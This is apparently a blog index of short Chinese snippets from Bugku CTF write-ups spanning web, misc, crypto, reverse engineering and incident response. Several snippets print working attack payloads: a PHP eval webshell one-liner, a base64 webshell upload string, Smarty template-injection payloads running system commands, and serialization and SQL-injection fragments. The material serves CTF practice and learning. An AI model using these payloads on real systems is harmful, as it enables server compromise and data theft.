• 2024-06-02bugku 重重flag背后隐藏的秘密
    https://ctf.bugku.com/challenges/detail/id/269.html下载附件是个名为m'y_flag.txt的文本文件,打开一看眼花缭乱的flag,我去。按照规则提示搞一搞: 据说:真正的flag开头三位和结尾均为数字,第4位和倒数第3位为大写字母,聪明的你能找到它吗?匹配出一堆flag{xxx,不太会写正
  • 2024-04-29bugku_ez_java_serializd
    下载附件看到依赖CC3.1,没有waf,直接CC5打了。packagecom.eddiemurphy;importorg.apache.commons.collections.Transformer;importorg.apache.commons.collections.functors.ChainedTransformer;importorg.apache.commons.collections.functors.ConstantTransformer;impo
  • 2024-03-18Web_Bugku_WriteUp | 聪明的php
    题目分析翻译一下题目:传递一个参数,也许标志文件的文件名是随机的:>于是随便传个参数?a,出现php代码:<?phpinclude('./libs/Smarty.class.php');echo"passaparameterandmaybetheflagfile'sfilenameisrandom:>";$smarty=newSmarty();//new一个Smarty模
  • 2024-03-13Moe RE - 【bugku】的解题wp
    发现好像没人写wp,虽然很简单但是写一个....题目 分析下载文件打开,习惯首先丢到ExeinfoPE里看看有没有壳 没有壳的样子那放心丢到IDA(64-bit)里面 一进去就看到很有嫌疑的字符串,F5查看反汇编代码 刚好是main函数,左边的函数列表里函数很少,而且一个一个点进去也
  • 2024-03-10bugku--crypto
    把猪困在猪圈里  看到了=和一些英文加数字,首先想到了base解密,然后用base64转化成图片,再用猪圈解密你喜欢下棋吗  先棋盘密码解密,得出密码之后打开第二个压缩包,提到了5bit编码,开搜,再用BaudotCode解决EN-气泡  用bubble加密解密,这里需要注意解码三次才能得出结果
  • 2024-03-10bugku--misc
    这是一张单纯的图片  将后缀改成.html再打开可以看到key隐写  用010打开,修改高度为F4就可以了telnet  解压后改后缀名为.txt,然后用记事本打开就可以看到了眼见非实 解压但是要改成.zip然后才能看到doc文件,再解压后搜索flag啊哒! 查看照片属性,看到一串数字,进
  • 2023-11-20Misc_Bugku_WriteUp | 这是一张单纯的图片
    题目(一张jpg格式的图片分析查看属性,没有信息。用010Editor打开,确认文件头为jpg文件头。查看内容,在文件末尾发现一串有规律的字符&#107;&#101;&#121;&#123;&#121;&#111;&#117;&#32;&#97;&#114;&#101;&#32;&#114;&#105;&#103;&#104;&#116;&am
  • 2023-11-06bugku----应急加固1 WP
    bugku----应急加固1WP1.获取js劫持域名(带https)https://www.194nb.com2.黑客首次webshell密码导出/var/log/nginx中的日志全局搜索POST3.黑客首次攻击(非有效攻击)通过什么方式(如:文件上传、SQL注入、命令执行)搜索恶意ip,发现是xss4.请找到黑客留下的后门中黑客服务
  • 2023-11-06bugku----应急加固【简单】 WP
    bugku----应急加固【简单】WP开始应急响应1.先将网站源码复制出来2.看第一题询问提权方式查看apache日志,发现sql注入的痕迹发现网站源码中存在phpmyadmin,进而发现是udf提权查看数据库密码3.第二题删除webshell继续查看日志这个地方可疑果然是webshell4.第
  • 2023-10-08bugku渗透测试2 WP
    bugku渗透测试2WPbugku渗透测试1WP有详细的frp,proxifier配置https://www.cnblogs.com/thebeastofwar/p/17744965.html注意这次因为有三次frp代理,所以注意代理命名和端口号要不同(frpc1.ini,frpc2.ini,frpc3.ini样例)先fscan一段扫,无果然后nmap扫全端口,无果之后
  • 2023-09-17CTF BugKu平台——Crypto篇刷题记录(后续更新)
    (CTFBugKu平台——Crypto篇)前言记录一下密码学的刷题记录也是为了更好的巩固自己基本有的解码都附有超链接希望大家能顺利通关感谢观看!抄错的字符:描述:老师让小明抄写一段话,结果粗心的小明把部分数字抄成了字母,还因为强迫症把所有字母都换成大写。你能帮小明恢复并
  • 2023-09-08CTF BugKu平台—Misc:多种方法解决
    题目链接:https://ctf.bugku.com/challenges/detail/id/12.html下载下来是个exe运行然后不行放入winhex中发现了base64还有jpg会不会是base转图片还真是把后缀改为txt全部复制放入网站还原base64图片转换:http://tool.chinaz.com/tools/imgtobase/把图片下载下来使
  • 2023-08-30CTF训练场
    免费BugKu攻防世界BUUCTF收费CTF秀
  • 2023-08-30Bugku-web34(文件包含)
    一:学到了一个挺有意思的文件包含代码::<scriptlanguage=php>system("find/-nameflag*");</script>二:文件上传的方式;菜刀连接;;<scriptlanguage="php">phpinfo();@eval($_POST['flag']);</script>
  • 2023-08-30Bugku-web35(序列化)
    访问css样式之后得到提示:扒下代码::<?phperror_reporting(0);$KEY='ctf.bugku.com';include_once("flag.php");$cookie = $_COOKIE['BUGKU'];if(isset($_GET['20260'])){    show_source(__FILE__);}elseif (unserialize($cookie) 
  • 2023-08-30Bugku-web36(sql注入)
    这个题目对于我来说还是很有难度的;;;毕竟我菜;;;唉;;;打开页面是个登录界面::扫描看了一圈发现这个images下面有这个sql的图片,这个是sql注入问题没错了,但是怎么注入是个问题;;sql注入学的太菜了;还是好好补基础;看了各种大师傅的blog还是挺懵逼的;;;selectuserfrommysql.userwhereuser=
  • 2023-08-30Bugku-web37
    不能放过任何提示或是编码:参考博客::https://blog.csdn.net/qq_41209264/article/details/112300712$sql="SELECTusername,passwordFROMadminWHEREusername='".$username."'";if(!empty($row)&&$row['password']===md5($passwo
  • 2023-08-30Bugku-web39(CBC反转攻击)
    传入cipher::o0Na0VUpA9NNqK5lQTP3chZqec57H%2FAMEkq5YSNE3oDfyc1WXAyLMW8RbiwIX9dyKMF5uwWSEzJVCKxOsDnVcQ%3D%3D传入的vi::L4p%2BUXpwki%2FiUktyYxs7eg%3D%3D<?phpheader("Content-Type:text/html;charset=utf-8");#计算cipher/*明文1:a:2:{s:8:&q
  • 2023-08-30Bugku-web40
    这题考察的是git信息泄露,挺好的题目;;我都不懂git信息泄露是什么鬼用dirsearch扫描后有.git目录,电脑浏览器访问发现不了什么,看了大哥的博客,用kali里面的git命令,现在学习一下这些命令::wget递归下载::gitreflog::查看执行的命令日志gitresetcommit_id::回退到该版本的版本库gitshow
  • 2023-08-30Bugku-web41
    该题目涉及到了序列化;Base64解码;cgi;ssrf;php中的file协议;代码审计,我只知道涉及到了序列化,还有我提交的方法是POST的,其他的我都不是很懂了,所以看了别人的wp;;https://blog.csdn.net/qq_53460654/article/details/116329685<?php// php版本:5.4.44header("Content-type: text/h
  • 2023-08-30Bugku-web安慰奖(序列化)
    php序列化的一个题目;;参考博客:https://blog.csdn.net/weixin_44190459/article/details/116648636目前还没有搞明白怎么一回事:<?phpclassctf{protected$username='admin';protected$cmd='tacflag.php';}$ctf=newctf();echoserialize($ctf);;?>
  • 2023-08-30Bugku-xxx二手交易市场
    注入点在上传图片处,图片上传后会被base64编码,就从这里入手,上传一句话木马;image=data%3Aimage%2Fphp%3Bbase64%2CPD9waHAgZXZhbCgkX1BPU1RbJ2ZsYWcnXSk7Pz4=
  • 2023-08-30Bugku-聪明的php
    smarty模板注入常用的payload常用payload常用payload{ifphpinfo()}{/if}{ifsystem('ls')}{/if}{ifreadfile('/flag')}{/if}{ifshow_source('/flag')}{/if}{ifsystem('cat../../../flag')}{/if}smarty中的{if}标签中可以执行php语句随便传参可
  • 2023-08-29Bugku-misc-telnet
    刚结束的ciscn,里面的要是有这么简单就好了。下载附件,是个pcap文件,打开wireshark分析一节一节看过去就找到了flag没难度的~~~
  • 2023-08-29Bugku-Web13
    根据题意进行unescape解码,得到js脚本,将js脚本中的代码填入输入框中点击提交就得到了flag